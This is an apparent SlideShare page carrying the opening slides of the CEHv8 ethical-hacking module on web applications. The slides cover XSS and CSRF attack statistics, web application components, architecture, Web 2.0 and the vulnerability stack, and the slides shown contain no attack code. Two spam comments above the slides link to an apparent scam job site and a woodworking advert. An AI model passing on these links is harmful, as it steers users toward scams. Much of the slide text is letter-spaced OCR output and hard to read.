Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.

Hacking web applications CEHv8 module 13

574 Aufrufe

Veröffentlicht am

Step by step to endorse your knowledge in hacking web applications

Veröffentlicht in: Technologie
  • ●●● http://scamcb.com/ezpayjobs/pdf
       Antworten 
    Sind Sie sicher, dass Sie …  Ja  Nein
    Ihre Nachricht erscheint hier
  • The #1 Woodworking Resource With Over 16,000 Plans, Download 50 FREE Plans... ♣♣♣ http://tinyurl.com/y3hc8gpw
       Antworten 
    Sind Sie sicher, dass Sie …  Ja  Nein
    Ihre Nachricht erscheint hier

Hacking web applications CEHv8 module 13

  1. 1. Hacking Web Applications M o d u l e 1 3
  2. 2. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications H a c k in g W e b A p p lic a tio n s M o d u l e 1 3 E n g in e e re d b y H ackers. P r e s e n te d b y P ro fe s s io n a ls . a CEH E t h i c a l H a c k i n g a n d C o u n t e r m e a s u r e s v 8 M o d u l e 1 3 : H a c k i n g W e b A p p l i c a t i o n s E x a m 3 1 2 - 5 0 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1724
  3. 3. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications CEHS e c u r ity N e w s S e c u r i t y N e w s X S S A t t a c k s L e a d P a c k A s M o s t F r e q u e n t A t t a c k T y p e S o u r c e : h t t p : / / w w w . d a r k r e a d i n g . c o m S e c u r e c l o u d h o s t i n g c o m p a n y , F i r e H o s t , h a s t o d a y a n n o u n c e d t h e f i n d i n g s o f it s l a t e s t w e b a p p l i c a t i o n a t t a c k r e p o r t , w h i c h p r o v i d e s s t a t i s t i c a l a n a ly s is o f t h e 1 5 m i l l i o n c y b e r - a t t a c k s b l o c k e d b y its s e r v e r s in t h e US a n d E u r o p e d u r i n g Q 3 2 0 1 2 . T h e r e p o r t lo o k s a t a t t a c k s o n t h e w e b a p p l i c a t i o n s , d a t a b a s e s a n d w e b s i t e s o f F i r e H o s t ' s c u s t o m e r s b e t w e e n J u ly a n d S e p t e m b e r , a n d o f f e r s a n i m p r e s s i o n o f t h e c u r r e n t i n t e r n e t s e c u r i t y c l i m a t e as a w h o l e . A m o n g s t t h e c y b e r - a t t a c k s r e g i s t e r e d in t h e r e p o r t , F i r e H o s t c a t e g o r i s e s f o u r a t t a c k t y p e s in p a r t i c u l a r a s r e p r e s e n t i n g t h e m o s t s e r i o u s t h r e a t . T h e s e a t t a c k t y p e s a r e a m o n g F i r e H o s t 's ,S u p e r f e c t a ' a n d t h e y c o n s i s t o f C r o s s - s it e S c r i p t i n g (X SS ), D i r e c t o r y T r a v e r s a l s , S Q L I n j e c t i o n s , a n d C r o s s - s it e R e q u e s t F o r g e r y (C SR F ). O n e o f t h e m o s t s i g n i f i c a n t c h a n g e s in a t t a c k t r a f f i c s e e n b y F i r e H o s t b e t w e e n Q 2 a n d Q 3 2 0 1 2 w a s a c o n s i d e r a b l e r is e in t h e n u m b e r o f c r o s s - s i t e a t t a c k s , in p a r t i c u l a r XSS a n d CSRF a t t a c k s r o s e t o r e p r e s e n t 6 4 % o f t h e g r o u p in t h e t h i r d q u a r t e r (a 2 8 % i n c r e a s e d p e n e t r a t i o n ) . XSS is n o w t h e m o s t c o m m o n a t t a c k t y p e in t h e S u p e r f e c t a , w i t h CSRF n o w in s e c o n d . F i r e H o s t ' s s e r v e r s b l o c k e d m o r e t h a n o n e m i l l i o n XSS a t t a c k s d u r i n g t h i s p e r i o d a l o n e , a f i g u r e w h i c h r o s e Module 13 Page 1725 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited.
  4. 4. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications 69% , fr o m 6 0 3 ,0 1 6 s e p a ra te a tta c k s in Q 2 t o 1 ,0 1 8 ,8 1 7 in Q3. CSRF a tta c k s re a c h e d s e co nd p lace on th e S u p e rfe c ta a t 8 4 3 ,5 1 7 . C ross-site a tta c k s a re d e p e n d e n t u p o n th e tr u s t d e v e lo p e d b e tw e e n site a nd user. XSS a tta c k s in v o lv e a w e b a p p lic a tio n g a th e rin g m a lic io u s d a ta fr o m a u se r via a tr u s te d site (o fte n c o m in g in th e fo r m o f a h y p e rlin k c o n ta in in g m a lic io u s c o n te n t), w h e re a s CSRF a tta c k s e x p lo it th e tr u s t t h a t a site has f o r a p a rtic u la r us e r in s te a d . T hese m a lic io u s s e c u rity e x p lo its can also be used t o steal s e n s itiv e in fo r m a tio n such as u s e r n a m e s , p a s s w o rd s a nd c re d it ca rd d e ta ils - w it h o u t th e site o r user's k n o w le d g e . T h e s e v e rity o f th e s e a tta c k s is d e p e n d e n t o n th e s e n s itiv ity o f th e d a ta h a n d le d by th e v u ln e ra b le site a n d th is ran g e s f r o m p e rs o n a l d a ta fo u n d on social n e tw o r k in g sites, t o th e fin a n c ia l a n d c o n fid e n tia l d e ta ils e n te r e d on e c o m m e rc e sites a m o n g s t o th e rs . A g re a t n u m b e r o f o rg a n is a tio n s ha ve fa lle n v ic tim to such a tta c k s in re c e n t ye a rs in c lu d in g a tta c k s o n PayPal, H o tm a il a n d eBay, th e la tte r fa llin g v ic tim t o a sin g le CSRF a tta c k in 2 0 0 8 w h ic h ta r g e te d 18 m illio n users o f its K o re a n w e b s ite . F u r th e r m o r e in S e p te m b e r th is y e a r, IT g ia n ts M ic r o s o ft and G o o g le C h ro m e b o th ran e x te n s iv e p a tc h e s ta r g e te d a t s e c u rin g XSS fla w s , h ig h lig h tin g th e p re v a le n c e o f th is g r o w in g o n lin e th r e a t. "C ro ss-site a tta c k s a re a s e ve re th r e a t t o bu siness o p e ra tio n s , e s p e c ia lly if se rve rs a re n 't p r o p e r ly p re p a r e d ," said C hris H in k le y, CISSP - a S e n io r S e c u rity E n g in e e r a t F ire H o st. "It's v ita l t h a t a n y site d e a lin g w it h c o n fid e n tia l o r p riv a te u s e r d a ta ta k e s th e n e ce ssa ry p re c a u tio n s to e n s u re a p p lic a tio n s re m a in p ro te c te d . L o c a tin g and fix in g a n y w e b s ite v u ln e r a b ilit ie s a n d fla w s is a key s te p in e n s u rin g y o u r bu sin ess a n d y o u r c u s to m e rs , d o n 't fa ll v ic tim to an a tta c k o f th is n a tu re . T h e c o n s e q u e n c e s o f w h ic h can be s ig n ific a n t, in te r m s o f b o th fin a n c ia l a nd re p u ta tio n a l d a m a g e ." T h e S u p e rfe c ta a tta c k tr a ffic fo r Q 3 2 0 1 2 can be b ro k e n d o w n as fo llo w s : As w it h Q 2 2 0 1 2 , th e m a jo r ity o f a tta c k s F ire H o st b lo c k e d d u rin g th e th ir d c a le n d a r q u a r t e r o f 2 0 1 2 o rig in a te d in th e U n ite d S tates ( l l m i l l i o n / 74% ). T h e re has h o w e v e r , b e e n a g re a t s h ift in th e n u m b e r o f a tta c k s o r ig in a tin g f r o m E u ro p e th is q u a rte r, as 17% o f all m a lic io u s a tta c k tr a ffic seen by F ire H o s t c a m e fr o m th is re g io n . E u ro p e o v e r to o k S o u th e rn Asia (w h ic h w a s re s p o n s ib le fo r 6%), t o b e c o m e th e se c o n d m o s t lik e ly o rig in o f m a lic io u s tra ffic . V a rie d tr e n d s a m o n g th e S u p e rfe c ta a tta c k te c h n iq u e s are d e m o n s tr a te d b e tw e e n th is q u a r te r a n d last: D u rin g th e b u ild u p to th e h o lid a y season, e c o m m e r c e a c tiv ity ra m p s up d ra m a tic a lly and c y b e r-a tta c k s t h a t ta r g e t w e b s ite users' c o n fid e n tia l d a ta are also lik e ly t o in c re a s e as a re s u lt. As w e ll as cro ss-site a tta c k s, th e o th e r S u p e rfe c ta a tta c k ty p e s , SQL In je c tio n a n d D ire c to ry T ra n s ve rs a l, still re m a in a s ig n ific a n t th r e a t d e s p ite a s lig h t re d u c tio n in fr e q u e n c y th is q u a rte r. E c o m m e rc e b u sin esse s n e e d to be a w a re o f th e risks t h a t th is p e rio d m a y p re s e n t it t o its s e c u rity , as T o d d G lea so n , D ire c to r o f T e c h n o lo g y a t F ire H o st e xp la in s, "Y o u 'd b e t t e r b e lie v e t h a t h a cke rs w ill t r y and ta k e a d v a n ta g e o f a n y surges in h o lid a y s h o p p in g . T h e y w ill be d e v is in g a n u m b e r o f w a y s th e y can ta k e a d v a n ta g e o f a n y w e b a p p lic a tio n v u ln e ra b ilitie s a n d w ill use an a s s o r t m e n t o f d iffe r e n t a tta c k ty p e s a n d te c h n iq u e s to d o so. W h e n it's a m a t t e r o f Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1726
  5. 5. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications c o n f i d e n t i a l d a t a a t r is k , i n c l u d i n g c u s t o m e r ' s f i n a n c i a l i n f o r m a t i o n - c r e d i t c a r d a n d d e b i t c a r d d e t a i l s - t h e r e ' s n o r o o m f o r c o m p l a c e n c y . T h e s e o r g a n i s a t i o n s n e e d t o k n o w t h a t t h e r e ' s a n i n c r e a s e d l i k e l i h o o d o f a t t a c k d u r i n g t h i s t i m e a n d it 's t h e i r r e s p o n s i b i l i t y t o t a k e t h e n e c e s s a r y s t e p s t o s t o p s u c h a t t a c k s . " Copyright © 2013 UBM Tech, A ll rights reserved http://www.darkreading.com/5ecuritv/news/240009508/firehost-q3-web-application-report-xss- attacks-lead-pack-as-most-frequent-attack-type.html Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1727
  6. 6. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications M o d u le O b je c t iv e s CEH J How Web Applications Work J Session Management Attack J Web Attack Vectors J Attack Data Connectivity J Web Application Threats J Attack Web App Client J Web App Hacking Methodology J Attack Web Services J Footprint Web Infrastructure ■ ^ J Web Application Hacking Tools J Hacking W ebServers /1‫־‬ J Countermeasures J Analyze Web Applications J Web Application Security Tools J Attack Authentication Mechanism J Web Application Firewall J Attack Authorization Schemes J Web Application Pen Testing Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. M o d u l e O b j e c t i v e s T h e m a in o b je c tiv e o f th is m o d u le is t o s h o w th e v a rio u s kin d s o f v u ln e ra b ilitie s th a t can be d is c o v e re d in w e b a p p lic a tio n s . T h e a tta c k s e x p lo itin g th e s e v u ln e ra b ilitie s a re also h ig h lig h te d . T h e m o d u le s ta rts w it h a d e ta ile d d e s c rip tio n o f th e w e b a p p lic a tio n s . V a rio u s w e b a p p lic a tio n th r e a ts a re m e n tio n e d . T h e h a c k in g m e t h o d o lo g y re ve a ls th e v a rio u s ste p s in v o lv e d in a p la n n e d a tta c k . T h e v a rio u s to o ls t h a t a tta c k e rs use a re discussed t o e x p la in th e w a y th e y e x p lo it v u ln e ra b ilitie s in w e b a p p lic a tio n s . T h e c o u n te r m e a s u r e s t h a t can be ta k e n to t h w a r t a n y such a tta c k s a re also h ig h lig h te d . S e c u rity to o ls t h a t h e lp n e tw o r k a d m in is t r a t o r to m o n it o r a n d m a n a g e th e w e b a p p lic a tio n are d e s c rib e d . Finally w e b a p p lic a tio n p e n te s t in g is d iscussed. This m o d u le fa m ilia riz e s y o u w ith : Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1728
  7. 7. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications - Session M a n a g e m e n t A tta c k S A tta c k D ata C o n n e c tiv ity S A tta c k W e b A p p C lie n t s A tta c k W e b S ervices S W e b A p p lic a tio n H a ckin g T o o ls S C o u n te rm e a s u re s s W e b A p p lic a tio n S e c u rity T o o ls s W e b A p p lic a tio n F ire w a ll S W e b A p p lic a tio n Pen T e s tin g H o w W e b A p p lic a tio n s W o r k W e b A tta c k V e c to rs W e b A p p lic a tio n T h re a ts W e b A p p H a ckin g M e t h o d o lo g y F o o tp r in t W e b In fra s tru c tu r e H a ck in g W e b s e rv e rs A n a ly z e W e b A p p lic a tio n s A tta c k A u th e n tic a tio n M e c h a n is m A tta c k A u th o r iz a tio n S ch e m e s 3 Page 1729 Ethical Hacking and Countermeasures Copyright © by EC‫־‬C0UI1Cil All Rights Reserved. Reproduction isStrictly Prohibited. A £ A A A Module
  8. 8. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications Copyright © by E & C oin a l. All Rights Reserved. Reproduction is Strictly Prohibited. ‫־‬ ‫־‬ ^ M o d u l e F l o w W e b a p p lic a tio n s are th e a p p lic a tio n p ro g ra m s accessed o n ly w it h In te r n e t c o n n e c tio n e n a b le d . T h e se a p p lic a tio n s use HTTP as t h e ir p r im a r y c o m m u n ic a t io n p r o t o c o l. G e n e ra lly , th e a tta c k e rs ta r g e t th e s e a p p s fo r se v e ra l reasons. T h e y a re e x p o s e d t o v a rio u s a tta c ks . For cle a r u n d e rs ta n d in g o f th e "h a c k in g w e b a p p lic a tio n s " w e d iv id e d th e c o n c e p t in to v a rio u s s e ctio n s. Q W e b A p p C o n c e p ts Q W e b A p p T h re a ts © H a ckin g M e t h o d o lo g y Q W e b A p p lic a tio n H a ckin g T oo ls © C o u n te rm e a s u re s 0 S e c u rity T o o ls © W e b A p p Pen T e s tin g Let us b e g in w it h th e W e b A p p c o n c e p ts . Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1730
  9. 9. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications ^ ^ W e b A p p P e n T e s t i n g W e b A p p C o n c e p ts S e c u rity T o o ls W e b A p p T h re a ts C o u n te rm e a s u r e s ^ H a c k in g M e t h o d o lo g y W e b A p p lic a tio n H a c k in g T o o ls T h is s e c t i o n i n t r o d u c e s y o u t o t h e w e b a p p l i c a t i o n a n d it s c o m p o n e n t s , e x p l a i n s h o w t h e w e b a p p l i c a t i o n w o r k s , a n d its a r c h i t e c t u r e . I t p r o v i d e s i n s i g h t i n t o w e b 2 . 0 a p p l i c a t i o n , v u l n e r a b i l i t y s t a c k s , a n d w e b a t t a c k v e c t o r s . Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1731
  10. 10. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications CEH Web Application Security Statistics Cross-Site Scripting Information Leakage Copyright © by E tC tin d l. All Rights Reserved. Reproduction is Strictly Prohibited. f f W e b A p p l i c a t i o n S e c u r i t y S t a t i s t i c s ~ S ou rce : h tt p s : / / w w w . w h it e h a t s e c . c o m A c c o rd in g t o th e W H IT E H A T s e c u rity w e b s ite sta tis tic s r e p o r t in 2 0 1 2 , it is c le a r th a t th e cross- site s c rip tin g v u ln e ra b ilitie s are fo u n d o n m o r e w e b a p p lic a tio n s w h e n c o m p a r e d t o o th e r v u ln e ra b ilitie s . F ro m th e g ra p h y o u can o b s e rv e t h a t in th e y e a r 2 0 1 2 , cro ss -site s c rip tin g v u ln e ra b ilitie s a re th e m o s t c o m m o n v u ln e ra b ilitie s fo u n d in 55% o f th e w e b a p p lic a tio n s . O n ly 10% o f w e b a p p lic a tio n a tta c k s a re based o n in s u ffic ie n t se ssio n e x p ir a tio n v u ln e ra b ilitie s . In o r d e r t o m in im iz e th e risks a ss o cia te d w it h cro ss -site s c rip tin g v u ln e ra b ilitie s in th e w e b a p p lic a tio n s , y o u have t o a d o p t n e ce s sa ry c o u n te r m e a s u re s a g a in s t th e m . Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1732
  11. 11. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications Cross-Site Scripting Inform ation Leakage Content Spoofing 16% Insufficient Authorization ■ L Cross-Site Request Forgery Brute Force Predictable Resource Location SQL Injection 10% Session Fixation Insufficient Session Expiration 2010 W O ■a>4 Q aI—H £ C o • H 0 ■ H a . a 1 FIGURE 13.1: WHITEHAT SECURITY WEBSITE STATISTICS REPORT, 2012 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1733
  12. 12. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications I n t r o d u c t i o n t o W e b A p p l i c a t i o n s C E H T h o u g h w e b a p p lic a tio n s e n fo rc e c e rta in s e c u rity p o licie s, th e y are v u ln e ra b le to v a rio u s a tta c k s such as SQL in je c tio n , cro ss-site s c rip tin g , session h ija c k in g , etc. * , W e b a p p lic a tio n s p ro v id e an in te rfa c e b e tw e e n e n d users a nd w e b se rve rs th ro u g h a set o f w e b pages th a t are g e n e ra te d a t th e se rver e nd o r c o n ta in s c rip t co d e to be e xe cu te d d y n a m ic a lly w ith in th e c lie n t w e b b ro w s e r N e w w e b te c h n o lo g ie s such as W e b 2 .0 p ro v id e m o re a tta c k su rfa ce fo r w e b a p p lic a tio n e x p lo ita tio n C o p yrig h t © by E&C01nal. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . W e b a p p lic a tio n s a n d W e b 2 .0 te c h n o lo g ie s a re in v a ria b ly u s e d to s u p p o r t c ritic a l b u s in e s s fu n c tio n s s u c h as C R M , S C M , e tc . a n d im p ro v e b u s in e s s e ffic ie n c y I n t r o d u c t i o n t o W e b A p p l i c a t i o n s W eb applications are the application th a t run on the rem ote w eb server and send the o u tp u t over the Internet. W eb 2.0 technologies are used by all the applications based on the web-based servers such as com m unication w ith users, clients, th ird -p a rty users, etc. A w eb application is com prised o f m any layers o f functiona lity. However, it is considered a three-layered architecture consisting o f presentation, logic, and data layers. The web architecture relies substantially on the technology popularized by the W orld W ide W eb, H ypertext M arkup Language (HTML), and the prim ary tra n sp o rt m edium , e.g. Hyper Text Transfer Protocol (HTTP). HTTP is the m edium o f com m unication betw een the server and the client. Typically, it operates over TCP port 80, but it may also com m unicate over an unused port. W eb applications provide an interface betw een end users and w eb servers through a set of w eb pages th a t are generated at the server end or contain script code to be executed dynam ically w ith in the client w eb browser. Some o f the popular w eb servers present today are M icrosoft IIS, Apache Software Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun One. Resources are called U niform Resource Identifiers (URIs), and they may either be static pages or contain dynam ic content. Since HTTP is stateless, e.g., the proto co l does not m aintain a session state, Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1734
  13. 13. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications the requests fo r resources are treated as separate and unique. Thus, the inte g rity o f a link is not m aintained w ith the client. Cookies can be used as tokens, w hich servers hand over to clients to allow access to websites. However, cookies are not perfect fro m a security point o f view because they can be copied and stored on the client's local hard disk, so th a t users do not have to request a token fo r each query. Though w eb applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on w eb applications and W eb 2.0 technologies to support key business processes and im prove perform ance. New w eb technologies such as W eb 2.0 provide m ore attack surface fo r w eb application e xp lo ita tio n . Attackers use d iffe re n t types o f vulnerabilities th a t can be discovered in w eb applications and exploit them to com prom ise w eb applications. Attackers also use tools to launch attacks on w eb applications. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1735
  14. 14. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications W e b A p p l i c a t i o n C o m p o n e n t s C Urtifwd E H itfcMjl NMhM 1 IS C o p yrig h t © by E&Coinal. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . ^ W e b A p p l i c a t i o n C o m p o n e n t s The com ponents o f w eb applications are listed as follow s Login: M ost o f the w ebsites allow a u th e n tic users to access the application by means o f login. It means th a t to access the service or content offered by the w eb application user needs to subm it his/her usernam e and password. Example gm ail.com The Web Server: It refers to either softw are or hardw are intended to deliver web content th a t can be accessed through the Internet. An exam ple is the w eb pages served to the w eb brow ser by the web server. Session Tracking Mechanism: Each w eb application has a session tracking m echanism . The session can be tracked by using cookies, URL rew riting, or Secure Sockets Layer (SSL) inform ation. User Permissions: W hen you are not allow ed to access the specified web page in which you are logged in w ith user permissions, you may redirect again to the login page or to any oth e r page. The Application Content: It is an interactive program th a t accepts w eb requests by clients and uses the param eters th a t are sent by the w eb brow ser fo r carrying out certain functions. Data Access: Usually the w eb pages w ill be contacting w ith each oth e r via a data access library in which all the database details are stored. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1736
  15. 15. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications The Data Store: It is a w ay to the im p o rta n t data th a t is shared and synchronized betw een the children/thre ats. This stored inform ation is quite im p o rta n t and necessary fo r higher levels of the application fra m e w o rk. It is not m andatory th a t the data store and the w eb server are on the same netw ork. They can be in contact or accessible w ith each other through the netw ork connection. Role-level System Security Application Logic: Usually w eb applications are divided into tiers o f w hich the application logic is the m iddle tier. It receives the request from the w eb brow ser and gives it services accordingly. The services offered by the application logic include asking questions and giving the latest updates against the database as w ell as generating a user interface. Logout: An individual can shut dow n or log out of the w eb application or brow ser so th a t the session and the application associated w ith it end. The application ends e ith e r by taking the initiative by the application logic or by autom atically ending w hen the servlet session tim es out. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1737
  16. 16. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications H o w W e b A p p l i c a t i o n s W o r k C E H SELECT * fr o m new s w h e re i d = 6 3 2 9 O u tp u t ID Topic News 6329 Tech CNN C o p yrig h t © by E&C01nal. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . H o w W e b A p p l i c a t i o n s W o r k W henever som eone clicks or types in the brow ser, im m ediately the requested w ebsite or content is displayed on the screen of the com puter, but w hat is the m echanism behind this? This is the step-by-step process th a t takes place once a user sends a request fo r particular content or a w ebsite w here m ultiple com puters are involved. The w eb application m odel is explained in three layers. The first layer deals w ith the user input through a web brow ser or user interface. The second layer contains JSP (Java servlets) or ASP (Active Server Pages), the dynam ic content generation technolo gy tools, and the last layer contains the database fo r storing custom er data such as user names and passwords, credit card details, etc. or oth e r related inform ation. Let's see how the user triggers the initial request through the brow ser to the w eb application server: © First the user types the w ebsite name or URL in the brow ser and the request is sent to the w eb server. © On receiving the request ,the w eb server checks the file extension: © If the user requests a sim ple w eb page w ith an HTM or HTML extension, the web server processes the request and sends the file to the user's browser. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1738
  17. 17. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications © If the user requests a w eb page w ith the extension CFM, CFML, or CFC, then the request m ust be processed by the w eb application server. Therefore, the web server passes the user's request to the w eb application server. The user's request is now processed by the w eb applicatio n server. In order to process the user's request, the w eb server accesses the database placed at the th ird layer to perform the requested task by updating or retrieving the inform ation stored on the database. Once done processing the request, web application server sends the results to the w eb server, w hich in tu rn sends the results to the user's browser. User Login Form Internet Firewall Web Server FIGURE 1 3.2 : W o rk in g o f W e b A p p lic a tio n Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1739
  18. 18. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications W e b A p p l i c a t i o n A r c h i t e c t u r e C E H y ^ lln t e m e r N ( W eb Clients Services Business Layer A p p lica tion Server Business Logic J2EE .NET COM XCode C++ COM+ Legacy Application Data Access ‫ה‬Proxy Server, Cache P re se n ta tio n Layer Firewall HTTP R equest Parser A u th e n tication and Login Resource H andler Servlet C ontainer Copyright © by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited. W e b A p p l i c a t i o n A r c h i t e c t u r e All w eb applications execute w ith the help o f the w eb brow ser as a support client. The w eb applications use a group o f server-side scripts (ASP, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The inform ation is presented by using the client-side script and the hardw are tasks such as storing and gathering required data by the server-side script. In the follow ing architecture, the clients uses d iffe re n t devices, w eb browsers, and external w eb services w ith the Internet to get the application executed using d iffe re n t scripting languages. The data access is handled by the database layer using cloud services and a database server. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1740
  19. 19. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications Business Layer Application Server J2EE .NET COM Business logic XCode C+♦ COM♦ legacy Application Data Access Database Layer Cloud Services Database Server Clients W eb Browser‫ו‬——, V•*'‫׳‬ ‫י‬ ‫ד‬ ‫ג‬ ‫ל‬ •‫י‬_ _ _U S ^External™1 W eb S«rvic*1 Presentation layer Fla sh . S ilv e r lljh t. Ja va S crip ( Smart Phonas, Web Appliance f Proxy Server, Cache Web Server Prssantation Layer Firewall HTTP Request Parser Servlet Resource Authentication Container Handler and Login FIGURE 1 3 .3 : W e b A p p lic a tio n A rc h ite c tu re Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1741
  20. 20. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications W e b 2 . 0 A p p l i c a t i o n s C E H C«rt1fW4 itfciul NMkM J W e b 2 .0 refers to a n e w g e n e ra tio n o f W e b a p p lic a tio n s th a t p ro v id e an in fra s tru c tu re fo r m o re d y n a m ic user p a rtic ip a tio n , social in te ra c tio n a nd c o lla b o ra tio n Blogs (W ordpress) Q Advanced gaming ODynamic as opposed to static site content ORSS-generated syndication O Social netw o rking sites (Flickr, ' Facebook, del.cio.us) v‫״‬ ..rid'‫'׳׳‬«»? ' Q Mash-ups (Emails, IMs, Electronic f payment systems) OW ikis and oth e r collaborative applications Q Google Base and other free Web services (Google Maps) o o New technologies like AJAX (Gmail, YouTube) Q M obile application (iPhone) O Flash rich interface websites O Fram eworks (Yahool Ul Library, jQ uery) Cloud computing websites like W (amazon.com) ^ Interactive encyclopedias and dictionaries O ine office software (Google Docs and Microsoft light) Ease o f data creation, m odification, or deletion by individual users C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . W e b 2 . 0 A p p l i c a t i o n s W eb 2.0 refers to a new generation o f w eb applications th a t provide an in fra stru ctu re fo r m ore dynam ic user participation, social interaction, and collaboration. It offers various features such as: © Advanced gam ing © Dynamic as opposed to static site content © RSS-generated syndication © Social netw orking sites (Flickr, Facebook, del.cio.us) © M ash-ups (emails, IMs, electronic paym ent systems) © W ikis and oth e r collaborative applications © Google Base and oth e r free w eb services (Google Maps) © Ease o f data creation, m odification, or deletion by individual users © Online office softw are (Google Docs and M icrosoft Light) © Interactive encyclopedias and dictionaries © Cloud com puting w ebsites such as Am azon.com Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1742
  21. 21. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications 6 Fram eworks (Yahoo! Ul Library, j Query) © Flash-rich interface websites Q M obile application (iPhone) Q New technologies like AJAX (Gmail, YouTube) © Blogs (W ordpress) Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1743
  22. 22. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications C E HV u l n e r a b i l i t y S t a c k _ C u s to m W e b A p p lic a tio n s B _ B u s in e s s Logic F la w s T e c h n ic a l V u ln e ra b ilitie s T h ird P a rty C o m p o n e n ts E l E O p e n S o u rc e / C o m m e rc ia l f ^ ‫־‬w r O ra c le / M yS Q L / M S SQL A p a c h e / M ic r o s o ft IIS Apache W in d o w s / L in u x /OSX R o u te r / S w itc h IPS / IDS C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . D a ta b a s e W e b S e rv e r O p e ra tin g S y s te m N e tw o r k S e c u rity V u l n e r a b i l i t y S t a c k i f - The w eb applications are m aintained and accessed through various levels th a t include: custom w eb applications, th ird -p a rty com ponents, databases, w eb servers, operating systems, netw orks, and security. All the m echanism s or services em ployed at each level help the user in one or the oth e r way to access the w eb application securely. W hen talking about web applications, security is a critical com ponent to be considered because w eb applications are a m ajor sources o f attacks. The follow ing v u ln e ra b ility stack shows the levels and the corresponding elem ent/m echanism /service em ployed at each level th a t makes the web applications vulnerable: Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1744
  23. 23. Exam312-50 Certified Ethical Hacker Business Logic Flaws Technical Vulnerabilities Open Source / Commercial Oracle / MySQL / MS SQL Apache / Microsoft IIS Windows / Linux /O S X Router / Switch IPS /ID S Ethical Hacking and Countermeasures Hacking Web Applications Custom Web Applications Third Party Components Security FIGURE 1 3 .4 : V u ln e ra b ility S tack Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1745
